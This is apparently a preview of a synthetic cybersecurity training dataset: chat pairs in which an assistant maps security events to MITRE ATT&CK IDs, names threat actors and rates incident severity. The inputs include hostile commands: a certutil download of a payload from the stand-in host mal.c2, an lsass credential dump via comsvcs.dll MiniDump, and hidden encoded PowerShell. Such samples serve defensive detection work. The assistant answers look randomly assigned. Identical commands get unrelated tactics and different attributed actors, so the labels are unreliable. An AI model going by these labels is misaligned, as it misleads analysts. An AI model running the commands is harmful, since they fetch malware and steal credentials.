messages
listlengths
2
2
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.69.21.68", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techn...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-HJJD6DZ34X)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Command and Control", "role": "user" }, ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3922 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.132.74.29", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1484...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.98.21.49", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.49.130.2", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1176 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.142.210.150", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techni...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1770 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: MD5 File Name Exploit 73f493f6a2b0da23a79b50765c164e88 議程最新修正及注意事項.doc CVE-2012-0158 f6fafb7c30b1114befc93f39d0698560 0824.1.doc CVE-2012-0158 eaa6e03d9dae356481215e3a9d2914dc 簡易名冊0全國各警察機關主官至分局長.doc CVE-2012-0158 06da4eb2a...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Malicious Document Decoy Document The attack starts with a spear-phishing email containing the HWP document named \"미북 정상회담 전망 및 대비.hwp\" (Prospects for US-North Korea Summit .hwp)", "role": "user" }, { ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: These databases can be stored as files on disk.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555.005\", \"T1555\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.193.189.105", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0002\", \"TA0009\"]...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-ITK8LTJYTG)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"Extrem...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CrossRAT uses run keys for persistence on Windows", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"T1547\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-1YZQFEMVPG)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Collection, Privilege Escalation", "role": "user" }, ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-MH7F12EB5F)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Collection", "role": "user" }, { "conten...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1774 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2102 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: DWriteCreateFactory()", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1129\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-W0VV2IU0B2)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"High\", \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1766 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2711 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.182.157.65", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T102...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techn...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-JBKHVVX0ZG)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Defense Evasion", "role": "user" }, { "content":...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Pupy uses PsExec to execute a payload or commands on a remote host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1569.002\", \"T1569\"]}", "role": "assistant" } ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Dacls can download its payload from a C2 server.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.145.138.75", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0007\"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: VERMIN collects data stored in the clipboard.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1115\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Segment networks and systems appropriately to reduce access to critical systems and services to controlled methods.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1210\"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: These files typically require root permissions to modify and are executed each time any shell on a system launches.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.110.59.115", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1003...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-EPFZWPZISG)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence, Command and Control, Impact", "role": "user" }, { "cont...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-PNLVDAY507)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Discovery, Credential Access", "role": "user" }, { "content": "{\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.106.130.145", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for newly constructed files that may establish persistence through executing malicious commands triggered by a user’s shell.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Additionally, xcopy on Windows can copy files and directories with a variety of options.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1560.001\", \"T1560\"]}", "ro...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confidence\": \"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: load additional modules", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1129\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.149.48.93", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T102...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1180 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"co...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Kazuar downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-B8RJF96T1G)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Collection", "role": "user" }, { "content":...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Zebrocy has used URL/Percent Encoding on data exfiltrated via HTTP POST requests.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1132.001\", \"T1132\"]}", "role": "assista...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Bazar can perform a check to ensure that the operating system's keyboard and language settings are not set to Russian.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T161...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.85.122.122", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1484.001\"]...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Remsec is capable of using DNS for C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071.004\", \"T1071\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3568 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.22.31.238", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniq...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.193.20.31", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-J3MQWYAGOB)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution, Collection, Reconnaissance", "role": "user" }, { "co...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: APT39 used secure shell (SSH) to move laterally among their targets.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021\", \"T1021.004\"]}", "role": "assistant" }...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.123.148.18", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-D8P3K7G9ZZ)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Defense Evasion, Discovery", "role": "user" }...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: QUADAGENT encodes C2 communications with base64.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1132.001\", \"T1132\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-NH7MOGUKY4)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Collection, Command and Control, Persistence", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3539 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"co...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Also look for other behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser or Office processes.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.60.153.211", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techn...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Ensure all COM alerts and Protected View are enabled.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0008\"], \"techniques\": [\"T1559\", \"T1021.003\", \"T1559.001\", \"T1021\"]}", "role"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.115.246.44", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techni...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-7I9OX73I8D)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Discovery, Lateral Movement", "role": "user" }, { "content":...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.173.65.80", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0006\", \"TA0010\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may gather information about the victim's organization that can be used during targeting.", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1591\"]}", "role...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\": \"Hi...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: POWERSTATS has connected to C2 servers through proxies.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1090\", \"T1090.002\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-INK144QGKI)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Impact, Initial Access", "role": "user" }, { "content"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Zebrocy searches for files that are 60mb and less and contain the following extensions: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .exe, .zip, and .rar.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"],...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-FKXY9QTYFY)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Execution, Command and Control", "role": "user" }...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-GHR3USZS1Z)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\": \"Cr...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-V63FJJ4G6J)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Reconnaissance, Privilege Escalation", "role": "user" ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Cuba can use the command cmd.exe /c del to delete its artifacts from the system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "as...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: YAHOYAH checks for the system’s Windows OS version and hostname.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 661 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confide...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Establish centralized logging for the activity of cloud compute infrastructure components.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1578\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-83H57EFZ93)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Reconnaissance, Command and Control", "role": "user" ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.65.63.223", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0006\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3287 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.121.176.177", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-CA8J1V817F)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Critica...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.33.70.122", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-NO6B9RO4AR)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Discovery, Execution", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-JNQMXP1G9U)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Command and Control, Reconnaissance", "role": "user" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-SHFYD5ZY3N)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Collection, Initial Access, Defense Evasion", "role": "user" }, ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: NotPetya can use wmic to help propagate itself across a network.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1047\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.105.81.12", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniq...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-E1SCGCPJ7X)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \"High\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-XXABYRT80D)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Execution, Initial Access, Exfiltration", "role": "user" }, ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-90FJHDKLN9)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Lateral Movement", "role": "user" }, { "content": "{\"se...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.154.92.234", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0040\", \"TA0009\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3785 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Operation Wocao has obtained the password for the victim's password manager via a custom keylogger.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.001\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-FVXQKRAKWZ)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Discovery, Reconnaissance, Persistence", "role": "user" }, { "cont...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor newly constructed files that may establish persistence by executing malicious content triggered by user inactivity.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546\...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Additionally, a sudden loss of a log source may indicate that it has been disabled.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.008\", \"T1562\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Enforce the principle of least-privilege.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0008\", \"TA0009\"], \"techniques\": [\"T1213\", \"T1213.003\", \"T1213.002\", \"T1550\"]}", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-BZQ3LXSPX7)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"Critica...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.164.107.214", "role": "user" }, { "content": "{\"tactics\": [\"TA...